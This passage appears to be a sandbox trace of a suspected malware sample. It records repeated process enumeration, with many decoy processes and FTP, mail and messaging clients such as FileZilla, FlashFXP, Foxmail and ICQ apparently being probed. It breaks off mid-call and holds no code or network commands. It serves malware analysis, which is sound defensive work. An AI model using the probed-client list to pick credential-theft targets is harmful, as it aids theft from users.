th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0085.915] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0085.917] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="through recognize.exe")) returned 1 [0085.923] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0085.924] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0085.926] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0085.927] CloseHandle (hObject=0x1484) returned 1 [0085.928] Sleep (dwMilliseconds=0x64) [0086.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1484 [0086.040] Process32First (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0086.042] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0086.044] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0086.045] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0086.047] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0086.048] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0086.050] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0086.051] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0086.053] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0086.054] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0086.055] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0086.057] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0086.059] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0086.060] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0086.062] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0086.063] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0086.064] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0086.066] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0086.067] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0086.069] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0086.070] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0086.072] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0086.073] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0086.076] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0086.077] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0086.079] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0086.080] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0086.081] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0086.083] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0086.084] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x804, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0086.085] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="sufferexistrich.exe")) returned 1 [0086.087] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="have return physical.exe")) returned 1 [0086.088] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or level.exe")) returned 1 [0086.089] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="court camera.exe")) returned 1 [0086.091] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or-finger.exe")) returned 1 [0086.092] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel imagine recently.exe")) returned 1 [0086.093] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="school_for.exe")) returned 1 [0086.095] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x978, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whosefirmthe.exe")) returned 1 [0086.096] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="seat_raise_join.exe")) returned 1 [0086.098] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="formerbuildpresent.exe")) returned 1 [0086.100] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="unittype.exe")) returned 1 [0086.102] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="allow.exe")) returned 1 [0086.103] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="rate.exe")) returned 1 [0086.106] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pushweight.exe")) returned 1 [0086.108] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="film.exe")) returned 1 [0086.109] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="dead.exe")) returned 1 [0086.111] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="than.exe")) returned 1 [0086.112] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0086.114] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0086.116] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0086.117] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0086.119] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0086.120] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0086.129] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0086.130] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0086.132] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0086.133] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0086.135] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0086.137] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0086.139] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0086.140] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0086.142] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0098.527] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x48c [0098.538] Process32First (in: hSnapshot=0x48c, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.445] Process32First (in: hSnapshot=0x146c, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.412] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x148c [0112.421] Process32First (in: hSnapshot=0x148c, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0117.569] Process32First (in: hSnapshot=0x148c, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.581] Process32First (in: hSnapshot=0xfdc, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.422] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x146c [0119.430] Process32First (in: hSnapshot=0x146c, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x146c [0129.215] Process32First (in: hSnapshot=0x146c, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xac4 [0145.732] Process32First (in: hSnapshot=0xac4, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1518 [0155.349] Process32First (in: hSnapshot=0x1518, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.866] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fc [0167.875] Process32First (in: hSnapshot=0x4fc, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.346] Process32First (in: hSnapshot=0x480, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.968] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x55c [0203.981] Process32First (in: hSnapshot=0x55c, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x151c [0250.217] Process32First (in: hSnapshot=0x151c, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.735] Process32First (in: hSnapshot=0x51c, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 41 os_tid = 0xe70 [0085.475] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) returned 1 [0085.476] GetClassNameA (in: hWnd=0x30122, lpClassName=0x7edfa00, nMaxCount=260 | 